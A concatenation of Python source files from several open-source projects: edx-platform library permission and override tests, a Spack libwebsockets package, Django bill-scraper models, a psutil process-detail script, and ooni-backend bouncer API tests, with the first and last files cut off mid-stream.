self.assertFalse(self._can_access_library(self.library))
self.assertFalse(self._can_access_library(library2_key))
# Now manually intervene to give non_staff_user access to library2_key:
access_role(library2_key).add_users(self.non_staff_user)
# Now non_staff_user should be able to access library2_key only:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 1)
self.assertEqual(lib_list[0]["library_key"], six.text_type(library2_key))
self.assertTrue(self._can_access_library(library2_key))
self.assertFalse(self._can_access_library(self.library))
@ddt.data(
OrgStaffRole,
OrgInstructorRole,
OrgLibraryUserRole,
)
def test_org_based_access(self, org_access_role):
"""
Test the various roles that allow viewing all of an organization's
libraries are working correctly.
"""
# Create some libraries as the staff user:
lib_key_pacific = self._create_library(org="PacificX", library="libP")
lib_key_atlantic = self._create_library(org="AtlanticX", library="libA")
# Login as a non-staff:
self._login_as_non_staff_user()
# Now manually intervene to give non_staff_user access to all "PacificX" libraries:
org_access_role(lib_key_pacific.org).add_users(self.non_staff_user)
# Now non_staff_user should be able to access lib_key_pacific only:
lib_list = self._list_libraries()
self.assertEqual(len(lib_list), 1)
self.assertEqual(lib_list[0]["library_key"], six.text_type(lib_key_pacific))
self.assertTrue(self._can_access_library(lib_key_pacific))
self.assertFalse(self._can_access_library(lib_key_atlantic))
self.assertFalse(self._can_access_library(self.lib_key))
@ddt.data(True, False)
def test_read_only_role(self, use_org_level_role):
"""
Test the read-only role (LibraryUserRole and its org-level equivalent)
"""
# As staff user, add a block to self.library:
block = self._add_simple_content_block()
# Login as a non_staff_user:
self._login_as_non_staff_user()
self.assertFalse(self._can_access_library(self.library))
block_url = reverse_usage_url('xblock_handler', block.location)
def can_read_block():
""" Check if studio lets us view the XBlock in the library """
response = self.client.get_json(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_edit_block():
""" Check if studio lets us edit the XBlock in the library """
response = self.client.ajax_post(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_delete_block():
""" Check if studio lets us delete the XBlock in the library """
response = self.client.delete(block_url)
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_copy_block():
""" Check if studio lets us duplicate the XBlock in the library """
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(self.library.location),
'duplicate_source_locator': six.text_type(block.location),
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
def can_create_block():
""" Check if studio lets us make a new XBlock in the library """
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(self.library.location), 'category': 'html',
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
return response.status_code == 200
# Check that we do not have read or write access to block:
self.assertFalse(can_read_block())
self.assertFalse(can_edit_block())
self.assertFalse(can_delete_block())
self.assertFalse(can_copy_block())
self.assertFalse(can_create_block())
# Give non_staff_user read-only permission:
if use_org_level_role:
OrgLibraryUserRole(self.lib_key.org).add_users(self.non_staff_user)
else:
LibraryUserRole(self.lib_key).add_users(self.non_staff_user)
self.assertTrue(self._can_access_library(self.library))
self.assertTrue(can_read_block())
self.assertFalse(can_edit_block())
self.assertFalse(can_delete_block())
self.assertFalse(can_copy_block())
self.assertFalse(can_create_block())
@ddt.data(
(LibraryUserRole, CourseStaffRole, True),
(CourseStaffRole, CourseStaffRole, True),
(None, CourseStaffRole, False),
(LibraryUserRole, None, False),
)
@ddt.unpack
def test_duplicate_across_courses(self, library_role, course_role, expected_result):
"""
Test that the REST API will correctly allow/refuse when copying
from a library with (write, read, or no) access to a course with (write or no) access.
"""
# As staff user, add a block to self.library:
block = self._add_simple_content_block()
# And create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
self._login_as_non_staff_user()
# Assign roles:
if library_role:
library_role(self.lib_key).add_users(self.non_staff_user)
if course_role:
course_role(course.location.course_key).add_users(self.non_staff_user)
# Copy block to the course:
response = self.client.ajax_post(reverse_url('xblock_handler'), {
'parent_locator': six.text_type(course.location),
'duplicate_source_locator': six.text_type(block.location),
})
self.assertIn(response.status_code, (200, 403)) # 400 would be ambiguous
duplicate_action_allowed = (response.status_code == 200)
self.assertEqual(duplicate_action_allowed, expected_result)
@ddt.data(
(LibraryUserRole, CourseStaffRole, True),
(CourseStaffRole, CourseStaffRole, True),
(None, CourseStaffRole, False),
(LibraryUserRole, None, False),
)
@ddt.unpack
def test_refresh_library_content_permissions(self, library_role, course_role, expected_result):
"""
Test that the LibraryContent block's 'refresh_children' handler will correctly
handle permissions and allow/refuse when updating its content with the latest
version of a library. We try updating from a library with (write, read, or no)
access to a course with (write or no) access.
"""
# As staff user, add a block to self.library:
self._add_simple_content_block()
# And create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
self._login_as_non_staff_user()
# Assign roles:
if library_role:
library_role(self.lib_key).add_users(self.non_staff_user)
if course_role:
course_role(course.location.course_key).add_users(self.non_staff_user)
# Try updating our library content block:
lc_block = self._add_library_content_block(course, self.lib_key)
# We must use the CMS's module system in order to get permissions checks.
self._bind_module(lc_block, user=self.non_staff_user)
lc_block = self._refresh_children(lc_block, status_code_expected=200 if expected_result else 403)
self.assertEqual(len(lc_block.children), 1 if expected_result else 0)
def test_studio_user_permissions(self):
"""
Test that user could attach to the problem only libraries that he has access (or which were created by him).
This test was created on the basis of bug described in the pull requests on github:
https://github.com/edx/edx-platform/pull/11331
https://github.com/edx/edx-platform/pull/11611
"""
self._create_library(org='admin_org_1', library='lib_adm_1', display_name='admin_lib_1')
self._create_library(org='admin_org_2', library='lib_adm_2', display_name='admin_lib_2')
self._login_as_non_staff_user()
self._create_library(org='staff_org_1', library='lib_staff_1', display_name='staff_lib_1')
self._create_library(org='staff_org_2', library='lib_staff_2', display_name='staff_lib_2')
with modulestore().default_store(ModuleStoreEnum.Type.split):
course = CourseFactory.create()
instructor_role = CourseInstructorRole(course.id)
auth.add_users(self.user, instructor_role, self.non_staff_user)
lib_block = ItemFactory.create(
category='library_content',
parent_location=course.location,
user_id=self.non_staff_user.id,
publish_item=False
)
def _get_settings_html():
"""
Helper function to get block settings HTML
Used to check the available libraries.
"""
edit_view_url = reverse_usage_url("xblock_view_handler", lib_block.location, {"view_name": STUDIO_VIEW})
resp = self.client.get_json(edit_view_url)
self.assertEqual(resp.status_code, 200)
return parse_json(resp)['html']
self._login_as_staff_user()
staff_settings_html = _get_settings_html()
self.assertIn('staff_lib_1', staff_settings_html)
self.assertIn('staff_lib_2', staff_settings_html)
self.assertIn('admin_lib_1', staff_settings_html)
self.assertIn('admin_lib_2', staff_settings_html)
self._login_as_non_staff_user()
response = self.client.get_json(LIBRARY_REST_URL)
staff_libs = parse_json(response)
self.assertEqual(2, len(staff_libs))
non_staff_settings_html = _get_settings_html()
self.assertIn('staff_lib_1', non_staff_settings_html)
self.assertIn('staff_lib_2', non_staff_settings_html)
self.assertNotIn('admin_lib_1', non_staff_settings_html)
self.assertNotIn('admin_lib_2', non_staff_settings_html)
@ddt.ddt
@override_settings(SEARCH_ENGINE=None)
class TestOverrides(LibraryTestCase):
"""
Test that overriding block Scope.settings fields from a library in a specific course works
"""
def setUp(self):
super(TestOverrides, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.original_display_name = "A Problem Block"
self.original_weight = 1
# Create a problem block in the library:
self.problem = ItemFactory.create(
category="problem",
parent_location=self.library.location,
display_name=self.original_display_name, # display_name is a Scope.settings field
weight=self.original_weight, # weight is also a Scope.settings field
user_id=self.user.id,
publish_item=False,
)
# Refresh library now that we've added something.
self.library = modulestore().get_library(self.lib_key)
# Also create a course:
with modulestore().default_store(ModuleStoreEnum.Type.split):
self.course = CourseFactory.create()
# Add a LibraryContent block to the course:
self.lc_block = self._add_library_content_block(self.course, self.lib_key)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
def test_overrides(self):
"""
Test that we can override Scope.settings values in a course.
"""
new_display_name = "Modified Problem Title"
new_weight = 10
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
# Add a second LibraryContent block to the course, with no override:
lc_block2 = self._add_library_content_block(self.course, self.lib_key)
lc_block2 = self._refresh_children(lc_block2)
# Re-load the two problem blocks - one with and one without an override:
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
problem2_in_course = modulestore().get_item(lc_block2.children[0])
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
self.assertEqual(problem2_in_course.display_name, self.original_display_name)
self.assertEqual(problem2_in_course.weight, self.original_weight)
def test_reset_override(self):
"""
If we override a setting and then reset it, we should get the library value.
"""
new_display_name = "Modified Problem Title"
new_weight = 10
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
# Reset:
for field_name in ["display_name", "weight"]:
self.problem_in_course.fields[field_name].delete_from(self.problem_in_course)
# Save, reload, and verify:
modulestore().update_item(self.problem_in_course, self.user.id)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, self.original_display_name)
self.assertEqual(self.problem_in_course.weight, self.original_weight)
def test_consistent_definitions(self):
"""
Make sure that the new child of the LibraryContent block
shares its definition with the original (self.problem).
This test is specific to split mongo.
"""
definition_id = self.problem.definition_locator.definition_id
self.assertEqual(self.problem_in_course.definition_locator.definition_id, definition_id)
# Now even if we change some Scope.settings fields and refresh, the definition should be unchanged
self.problem.weight = 20
self.problem.display_name = "NEW"
modulestore().update_item(self.problem, self.user.id)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem.definition_locator.definition_id, definition_id)
self.assertEqual(self.problem_in_course.definition_locator.definition_id, definition_id)
@ddt.data(False, True)
def test_persistent_overrides(self, duplicate):
"""
Test that when we override Scope.settings values in a course,
the override values persist even when the block is refreshed
with updated blocks from the library.
"""
new_display_name = "Modified Problem Title"
new_weight = 15
self.problem_in_course.display_name = new_display_name
self.problem_in_course.weight = new_weight
modulestore().update_item(self.problem_in_course, self.user.id)
if duplicate:
# Check that this also works when the RCB is duplicated.
self.lc_block = modulestore().get_item(
_duplicate_item(self.course.location, self.lc_block.location, self.user)
)
self.problem_in_course = modulestore().get_item(self.lc_block.children[0])
else:
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
# Change the settings in the library version:
self.problem.display_name = "X"
self.problem.weight = 99
new_data_value = "<problem><p>Changed data to check that non-overriden fields *do* get updated.</p></problem>"
self.problem.data = new_data_value
modulestore().update_item(self.problem, self.user.id)
self.lc_block = self._refresh_children(self.lc_block)
self.problem_in_course = modulestore().get_item(self.problem_in_course.location)
self.assertEqual(self.problem_in_course.display_name, new_display_name)
self.assertEqual(self.problem_in_course.weight, new_weight)
self.assertEqual(self.problem_in_course.data, new_data_value)
def test_duplicated_version(self):
"""
Test that if a library is updated, and the content block is duplicated,
the new block will use the old library version and not the new one.
"""
store = modulestore()
self.assertEqual(len(self.library.children), 1)
self.assertEqual(len(self.lc_block.children), 1)
# Edit the only problem in the library:
self.problem.display_name = "--changed in library--"
store.update_item(self.problem, self.user.id)
# Create an additional problem block in the library:
ItemFactory.create(
category="problem",
parent_location=self.library.location,
user_id=self.user.id,
publish_item=False,
)
# Refresh our reference to the library
self.library = store.get_library(self.lib_key)
# Refresh our reference to the block
self.lc_block = store.get_item(self.lc_block.location)
self.problem_in_course = store.get_item(self.problem_in_course.location)
# The library has changed...
self.assertEqual(len(self.library.children), 2)
# But the block hasn't.
self.assertEqual(len(self.lc_block.children), 1)
self.assertEqual(self.problem_in_course.location, self.lc_block.children[0])
self.assertEqual(self.problem_in_course.display_name, self.original_display_name)
# Duplicate self.lc_block:
duplicate = store.get_item(
_duplicate_item(self.course.location, self.lc_block.location, self.user)
)
# The duplicate should have identical children to the original:
self.assertEqual(len(duplicate.children), 1)
self.assertTrue(self.lc_block.source_library_version)
self.assertEqual(self.lc_block.source_library_version, duplicate.source_library_version)
problem2_in_course = store.get_item(duplicate.children[0])
self.assertEqual(problem2_in_course.display_name, self.original_display_name)
class TestIncompatibleModuleStore(LibraryTestCase):
"""
Tests for proper validation errors with an incompatible course modulestore.
"""
def setUp(self):
super(TestIncompatibleModuleStore, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
# Create a course in an incompatible modulestore.
with modulestore().default_store(ModuleStoreEnum.Type.mongo):
self.course = CourseFactory.create()
# Add a LibraryContent block to the course:
self.lc_block = self._add_library_content_block(self.course, self.lib_key)
def test_incompatible_modulestore(self):
"""
Verifies that, if a user is using a modulestore that doesn't support libraries,
a validation error will be produced.
"""
validation = self.lc_block.validate()
self.assertEqual(validation.summary.type, validation.summary.ERROR)
self.assertIn(
"This course does not support content libraries.", validation.summary.text)
| agpl-3.0 | 7,295,077,615,141,590,000 | 42.283381 | 118 | 0.641595 | false |
skosukhin/spack | var/spack/repos/builtin/packages/libwebsockets/package.py | 1 | 1834 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Libwebsockets(CMakePackage):
"""C library for lightweight websocket clients and servers."""
homepage = "https://github.com/warmcat/libwebsockets"
url = "https://github.com/warmcat/libwebsockets/archive/v2.1.0.tar.gz"
version('2.2.1', '1f641cde2ab3687db3d553f68fe0f620')
version('2.1.1', '674684ffb90d4a0bcf7a075eb7b90192')
version('2.1.0', '4df3be57dee43aeebd54a3ed56568f50')
version('2.0.3', 'a025156d606d90579e65d53ccd062a94')
version('1.7.9', '7b3692ead5ae00fd0e1d56c080170f07')
depends_on('zlib')
depends_on('openssl')
| lgpl-2.1 | -4,229,960,590,508,280,300 | 43.731707 | 79 | 0.685387 | false |
adieyal/billtracker | code/billtracker/scrapers/models.py | 1 | 3436 | from django.db import models
from django.conf import settings
import bills.models as bill_models
class GovInfoScraper(models.Model):
bill_name = models.CharField(max_length=100)
bill_code = models.CharField(max_length=10)
comment_startdate = models.DateField()
comment_enddate = models.DateField()
scrape_date = models.DateTimeField(auto_now_add=True)
url = models.URLField(null=True, blank=True)
reviewed = models.BooleanField(default=False)
def convert_to_bill(self):
if self.reviewed:
raise bill_models.BillException("Cannot re-convert once already converted")
bill = bill_models.Bill.objects.create(
name=self.bill_name,
code=self.bill_code,
)
bill_models.PreparliamentaryStage.objects.create(
bill=bill,
comments_start=self.comment_startdate,
comments_end=self.comment_enddate,
document_url=self.url
)
self.reviewed = True
self.save()
return bill
def __unicode__(self):
return "[%s] %s" % (self.bill_code, self.bill_name)
class BillsBeforeParliamentScraper(models.Model):
bill_name = models.CharField(max_length=100)
bill_code = models.CharField(max_length=10)
introduced_by = models.CharField(max_length=100)
date_introduced = models.DateField()
bill_stage = models.CharField(max_length=3, choices=[
("1", "National Assembly"),
("2", "NCOP"),
("3", "Sent to President"),
("4", "Finalised in an Act"),
("5", "Withdrawn"),
])
document_number = models.CharField(max_length=10)
url = models.URLField(null=True, blank=True)
committee = models.CharField(max_length=100, null=True, blank=True)
reviewed = models.BooleanField(default=False)
# TODO - add NCOP and Presidential stages
def convert_to_bill(self):
if self.reviewed:
raise bill_models.BillException("Cannot re-convert once already converted")
try:
bill = bill_models.Bill.objects.get(code=self.bill_code)
except bill_models.Bill.DoesNotExist:
bill = bill_models.Bill.objects.create(
name=self.bill_name,
code=self.bill_code,
)
bill_models.ParliamentIntroduction.objects.create(
bill=bill,
introduced_by=self.introduced_by,
date_introduced=self.date_introduced,
document_number=self.document_number,
url=self.url
)
if self.committee:
bill_models.ParliamentPortfolioCommittee.objects.create(
bill=bill,
committee=self.committee
)
self.reviewed = True
self.save()
return bill
def __unicode__(self):
return "[%s] %s" % (self.bill_code, self.bill_name)
class Meta:
verbose_name_plural = "Bills before parliament"
verbose_name = "Bills before parliament"
class ParliamentMinutesScraper(models.Model):
filename = models.FileField(upload_to=settings.DIR_PARLIAMENT_MINUTES)
house = models.CharField(max_length=20)
language = models.CharField(max_length=20)
date = models.DateField()
scrape_date = models.DateTimeField(auto_now_add=True)
url = models.URLField()
def __unicode__(self):
return "%s - %s" % (self.scrape_date, self.house)
| bsd-3-clause | -3,848,321,381,667,851,000 | 32.686275 | 87 | 0.625146 | false |
tamentis/psutil | examples/process_detail.py | 1 | 4156 | #!/usr/bin/env python
#
# $Id$
#
# Copyright (c) 2009, Jay Loden, Giampaolo Rodola'. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Print detailed information about a process.
"""
import os
import datetime
import socket
import sys
import psutil
def convert_bytes(n):
symbols = ('K', 'M', 'G', 'T', 'P', 'E', 'Z', 'Y')
prefix = {}
for i, s in enumerate(symbols):
prefix[s] = 1 << (i+1)*10
for s in reversed(symbols):
if n >= prefix[s]:
value = float(n) / prefix[s]
return '%.1f%s' % (value, s)
return "%sB" % n
def print_(a, b):
if sys.stdout.isatty() and os.name == 'posix':
fmt = '\x1b[1;32m%-17s\x1b[0m %s' %(a, b)
else:
fmt = '%-15s %s' %(a, b)
# python 2/3 compatibility layer
sys.stdout.write(fmt + '\n')
sys.stdout.flush()
def run(pid):
p = psutil.Process(pid)
if p.parent:
parent = '(%s)' % p.parent.name
else:
parent = ''
started = datetime.datetime.fromtimestamp(p.create_time).strftime('%Y-%M-%d %H:%M')
if hasattr(p, 'get_io_counters'):
io = p.get_io_counters()
mem = p.get_memory_info()
mem = '%s%% (resident=%s, virtual=%s) ' %(round(p.get_memory_percent(), 1),
convert_bytes(mem.rss),
convert_bytes(mem.vms))
cpu_times = p.get_cpu_times()
cpu_percent = p.get_cpu_percent(0)
children = p.get_children()
files = p.get_open_files()
threads = p.get_threads()
connections = p.get_connections()
print_('pid', p.pid)
print_('name', p.name)
print_('exe', p.exe)
print_('parent', '%s %s' % (p.ppid, parent))
print_('cmdline', ' '.join(p.cmdline))
print_('started', started)
print_('user', p.username)
if os.name == 'posix':
print_('uids', 'real=%s, effective=%s, saved=%s' % p.uids)
print_('gids', 'real=%s, effective=%s, saved=%s' % p.gids)
print_('terminal', p.terminal or '')
if hasattr(p, 'getcwd'):
print_('cwd', p.getcwd())
print_('memory', mem)
print_('cpu', '%s%% (user=%s, system=%s)' % (cpu_percent,
cpu_times.user,
cpu_times.system))
print_('status', p.status)
print_('niceness', p.nice)
print_('num threads', p.get_num_threads())
if hasattr(p, 'get_io_counters'):
print_('I/O', 'bytes-read=%s, bytes-written=%s' % \
(convert_bytes(io.read_bytes),
convert_bytes(io.write_bytes)))
if children:
print_('children', '')
for child in children:
print_('', 'pid=%s name=%s' % (child.pid, child.name))
if files:
print_('open files', '')
for file in files:
print_('', 'fd=%s %s ' % (file.fd, file.path))
if threads:
print_('running threads', '')
for thread in threads:
print_('', 'id=%s, user-time=%s, sys-time=%s' \
% (thread.id, thread.user_time, thread.system_time))
if connections:
print_('open connections', '')
for conn in connections:
if conn.type == socket.SOCK_STREAM:
type = 'TCP'
elif conn.type == socket.SOCK_DGRAM:
type = 'UDP'
else:
type = 'UNIX'
lip, lport = conn.local_address
if not conn.remote_address:
rip, rport = '*', '*'
else:
rip, rport = conn.remote_address
print_('', '%s:%s -> %s:%s type=%s status=%s' \
% (lip, lport, rip, rport, type, conn.status))
def main(argv=None):
if argv is None:
argv = sys.argv
if len(argv) == 1:
sys.exit(run(os.getpid()))
elif len(argv) == 2:
sys.exit(run(int(argv[1])))
else:
sys.exit('usage: %s [pid]' % __file__)
if __name__ == '__main__':
sys.exit(main())
| bsd-3-clause | 8,451,998,020,740,110,000 | 31.46875 | 87 | 0.492541 | false |
dstufft/ooni-backend | oonib/test/test_bouncer.py | 1 | 17723 | # -*- encoding: utf8 -*-
import json
from twisted.internet import defer
from cyclone import web
from oonib.bouncer.api import bouncerAPI
from oonib.test.handler_helpers import HandlerTestCase
fake_bouncer_file = """
collector:
fake_address:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_default_collector = """
collector:
fake_address:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
default_collector:
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_bouncer_file_multiple_collectors = """
collector:
fake_addressA:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
fake_addressB:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
- {name: another_fake_nettest, version: 2.0}
test-helper: {fake_test_helper: 'fake_hostname'}
"""
fake_for_test_helper_request = """
collector:
fake_addressA:
policy:
input:
- {id: fake_id}
nettest:
- {name: fake_nettest, version: 1.0}
test-helper: {fake_test_helper: 'fake_hostname', exotic_test_helper: 'fake_hostname'}
fake_addressB:
test-helper: {fake_test_helper: 'fake_hostname'}
"""
reports_dir = 'data/reports'
archive_dir = 'data/archive'
input_dir = 'data/inputs'
decks_dir = 'data/decks'
bouncer_filename = 'fake_bouncer_file.yaml'
fake_config_file = """
main:
report_dir: %s
archive_dir: %s
input_dir: %s
deck_dir: %s
bouncer_file: %s
helpers:
fake_test_helper:
attribute: value
""" % (reports_dir, archive_dir, input_dir, decks_dir, bouncer_filename)
class BaseTestBouncer(HandlerTestCase):
def setUp(self, *args, **kw):
self.make_dir(reports_dir)
self.make_dir(archive_dir)
self.make_dir(input_dir)
self.make_dir(decks_dir)
self.config_filename = 'fake_config.conf'
with open(self.config_filename, 'w') as config_file:
config_file.write(fake_config_file)
super(BaseTestBouncer, self).setUp()
self.filenames.add(bouncer_filename)
self.filenames.add(self.config_filename)
class TestBouncer(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_bouncer_file)
super(TestBouncer, self).setUp()
@defer.inlineCallbacks
def test_void_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": ['fake_test_helper'],
"input-hashes": [],
"name": '',
"version": '',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['collector'], 'fake_address')
@defer.inlineCallbacks
def test_backward_compatibility(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['collector'], 'fake_address')
@defer.inlineCallbacks
def test_multiple_net_tests(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
{
"test-helpers": [],
"input-hashes": [],
"name": 'another_fake_nettest',
"version": '1.0',
}
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 2)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('name', response_body['net-tests'][1])
self.assertEqual(response_body['net-tests'][1]['name'], 'another_fake_nettest')
@defer.inlineCallbacks
def test_invalid_net_test(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'invalid_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests_with_input(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": ['fake_id'],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 1)
self.assertEqual(response_body['net-tests'][0]['input-hashes'][0], 'fake_id')
@defer.inlineCallbacks
def test_net_tests_with_input_invalid_id(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": ['invalid_id'],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_net_tests_with_test_helper(self):
data = {
'net-tests': [
{
"test-helpers": ['fake_test_helper'],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'fake_nettest')
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 1)
self.assertEqual(response_body['net-tests'][0]['test-helpers']['fake_test_helper'], 'fake_hostname')
@defer.inlineCallbacks
def test_net_tests_with_invalid_test_helper(self):
data = {
'net-tests': [
{
"test-helpers": ['invalid_test_helper'],
"input-hashes": [],
"name": 'fake_nettest',
"version": '1.0',
},
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('collector-not-found', response_body['error'])
@defer.inlineCallbacks
def test_invalid_request(self):
data = {
'something_weird': 'nsa'
}
response = yield self.request('/bouncer', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('error', response_body)
self.assertEqual('test-helpers-or-net-test-key-missing', response_body['error'])
class TestDefaultCollector(BaseTestBouncer):
app = web.Application(bouncerAPI, name='bouncerAPI')
def setUp(self, *args, **kw):
with open(bouncer_filename, 'w') as bouncer_file:
bouncer_file.write(fake_default_collector)
super(TestDefaultCollector, self).setUp()
@defer.inlineCallbacks
def test_default_collector(self):
data = {
'net-tests': [
{
"test-helpers": [],
"input-hashes": [],
"name": 'imaginary_nettest',
"version": '1.0',
}
]
}
response = yield self.request('/bouncer/net-tests', 'POST', data)
response_body = json.loads(response.body)
self.assertIn('net-tests', response_body)
self.assertEqual(len(response_body['net-tests']), 1)
self.assertIn('name', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['name'], 'imaginary_nettest')
self.assertIn('version', response_body['net-tests'][0])
self.assertEqual(response_body['net-tests'][0]['version'], '1.0')
self.assertIn('input-hashes', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['input-hashes']), 0)
self.assertIn('test-helpers', response_body['net-tests'][0])
self.assertEqual(len(response_body['net-tests'][0]['test-helpers']), 0)
self.assertIn('collector', response_body['net-tests'][0])
